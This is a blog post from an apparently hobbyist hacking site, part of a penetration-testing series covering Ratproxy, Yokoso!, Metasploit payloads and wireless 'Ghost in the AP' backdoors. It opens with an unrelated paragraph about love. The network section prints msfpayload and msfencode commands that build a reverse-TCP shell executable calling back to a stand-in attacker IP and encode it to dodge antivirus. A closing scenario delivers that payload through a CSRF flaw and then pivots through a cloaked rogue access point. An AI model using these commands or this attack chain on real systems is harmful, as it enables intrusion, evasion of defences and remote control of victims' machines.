Be a loving person rather than in a love relationship because relationships happen one day and disappear another day. They are flowers; in the morning they bloom, by the evening they are gone. But people find it very difficult to be a loving person, a loving soul, so they create a relationship and be fool that way that "Now I am a loving person because I am in a relationship". And the relationship may be just one of monopoly, possessiveness and exclusiveness. The relationship is needed only because love is not there. Relationship is a substitute. Become alert! Relationship destroys love, destroys the very possibility of its birth.
Tuesday, 11 February 2014
Hello guys, Let continue Pen testing series. We had already covered 3 parts now let's Cover part 4.
Point of Focus
Let’s build on the concept of combined testing
We’ll discuss useful new tools and techniques
- In Part 1, the flow was 1) wireless 2) web app 3) network
- In Part 2, the flow was 1) network 2) wireless 3) web app
- To illustrate the pragmatic and iterative nature of combined tests, we’ll alter the order this time:
1) Web App attack – Discovery and exploitation (Ratproxy, Yokoso!)
2) Network exploitation – Useful Metasploit features (msfpayload, msfencode, multi-encode options for dodging Anti-Virus)
3) Wireless attack – Wireless Geo-location, GeoWig, and “Ghost in the AP” techniques
Web App Attacks
Ratproxy: Passive
Interception Proxy
Ratproxy is a mostly passive scanner
– Active tests are enable-able!
• Designed to proxy traffic and scan for flaws
– Based on the interplay between client and server
• Focuses on “Web 2.0” flaws
– Includes the ability to decompile and analyze Flash objects
– Was one of the first tools to find Cross-Site Request Forgery (CSRF) flaws well
• Ratproxy allows us to combine mapping the application and running a first pass looking for flaws
• Efficiency is the key!
– Chaining Ratproxy with other interception proxies that spider the site is one of our tricks
Yokoso! Infrastructure Fingerprinting
Originally designed to be an infrastructure fingerprinter
– Delivered via XSS flaws
- Contains three parts
– Lists of interesting URIs
– JavaScript code to find those URIs in browser history
– JavaScript code to find those URIs within the target network
- These parts are usable on compromised machines
– Also come bundled for use within BeEF
- The project is looking for more help collecting interesting URIs
Network Attack
Packaging an Attack with
msfpayload
Use the msfpayload tool in Metasploit 3.X to turn a payload into an EXE
$ ./msfpayload windows/shell/reverse_tcp LHOST=[AttackerIPaddr] LPORT=80 X
- The X generates an executable
– There are other options, including R, for raw
- We could put the payload on a USB token, send it via e-mail, put it on a file share, etc.
– Or, I don’t know… maybe deliver it via CSRF? Just wait…
- But, won’t an AV tool detect it?
– Perhaps… so let’s encode it to evade detection!
Evading IDS/IPS/AV with msfencode
Metasploit supports encoding exploits and payloads
– In msfconsole, use “show encoders” and “ set ENCODER [encoder]”
– Or, you can use msfencode program to encode a raw payload
- The latest trunk version supports a–c [N] option, to apply N rounds of encoding
– One of the best encoders for evasion is “x86/shikata_ga_nai” –Japanese for “nothing can be done about it”
$ ./msfpayload windows/shell/reverse_tcp LHOST=[AttackerIPaddr] LPORT=80 R | ./msfencode –e x86/shikata_ga_nai –c 4 –t exe –o payload.exe
Wireless Geo-Location
Question: Where is the client device I have just exploited?
– IP address information can be misleading (VPN, static, internal networks)
– iPhone pseudo GPS uses nearby Wi-Fi and cellular towers for location analysis
- Not enough integrated GSM/EV-DO interfaces to use cell tower locations
- Wi-Fi device location database available with the WIreless Geographic Logging Engine
– www.wigle.net, inspired by wardrivers!
What Networks Are Nearby?
Vista and OSX provide command-line tools for network discovery (no love for XP).
WiGLE Search
Tool: GeoWig
Automates searching WiGLE for BSSIDs
• Heuristics to identify APs with similar MAC addresses
– Common in corporate WLAN deployments
Ghost in the AP
Compromised APs provide tremendous value in a pen-test
• Leveraged as a network backdoor
– Configure additional virtual SSIDs
– Cloaked SSID with authorized (or similar)
MAC address (may go unnoticed)
• Attacker can target any VLAN accessible to compromised AP!
• Cisco Aironet device as an example, applies to many device manufacturers
Dubious Configuration
A Scenario - Example for you
Analyze Website with RatProxy… Find CSRF Flaw
Build AV-Dodging Payload &
Place on Load CSRF Trigger
Other Victim Accesses Content,
Running Reverse Shell
Access Target Network from Virtual AP & Attack Servers
So at last we did it. That is it. Let's conclude some point for you in the end. Combined attack vectors allow for far deeper penetration into most target networks than separate vectors
– Combining web app, network, and wireless penetration testing is very powerful
• This combination provides a much more accurate view of the business risks posed by vulnerabilities than offered by completely separate network, wireless, and web app tests.
OK then see you. Take care Buddies. Thanks for visiting. Have nice time.
Subscribe to:
Post Comments (Atom)
Search
Popular Posts
-
After studying or while studying, you may to work or you many want to have rather you would like to have some job experience. That will sur...
-
hello folks!, how you are all, this time i'm here to share some queries about OSI and TCP/IP model. Query 1 according to you, Wh...
-
Have you heard about, facebook has overtaken whatsapp. What you think out of it. Hello, there, facebook is using whatsapp. I will be tak...
-
Hello everyone, I'm back with hacking tutorial. This time i'm introducing to you how to hack facebook account using simple text ...
-
Hello there, Welcome to our blog. How you all are, Hope you all doing great. On our blog you will find support for tech, hacking and socia...
-
Apple is one of the most chosen products by people. Time by time it had produced such a concepts that has stunned most of us. Here as it...
-
Access Control Lists Introduction Hello everyone. How are you all. This time i'm going to discuss about Access control list with ...
-
Hello there, Welcome to our blog. How you all are, Hope you all doing great. On our blog you will find support for tech, hacking and so...
-
Social media is very important part of our life. I mean everyone's life. We can't have our food digest until we don't chat for...
-
Certified Ethical hacking Hello Folks, How ...
Categories
Account Hacking
ACL
Adobe Flash Player
algorithms
Android
APPS AND SOFTWARE
Basic Networking
Bluetooth Hacking
BREAKING NEWS
Bus Tupology
CCNA
ccna discovery
ccna exploration
CCNA Security
CCNA1
CCNA2
CCNA3
CCNA4
Cloud Storage
Credit Card Hacking
Cyber Criminal
Cyber security
DEVELOPERS
Encrypted Password
Encryption
facebook
FTP
FTP Server
GOOGLE GLASS
Google Hacking
hacking tool
internet and network security
Mark Zuckerberg
Media Hacked
NASA
Network Hacking
packet tracer tutorial
Port security
Programming
SOCIAL MEDIA
SOCIAL NETWORKS
Blog Archive
Get Content For Your Website
Get a 150-300 word article written for : $1.50
Get a 700-1000+ word article written for : $5.00
Have a 150-300 word article rewritten for : $1.25
Have a 700-1000+ word article rewritten for : $4.25
Get a 700-1000+ word article written for : $5.00
Have a 150-300 word article rewritten for : $1.25
Have a 700-1000+ word article rewritten for : $4.25
0 comments:
Post a Comment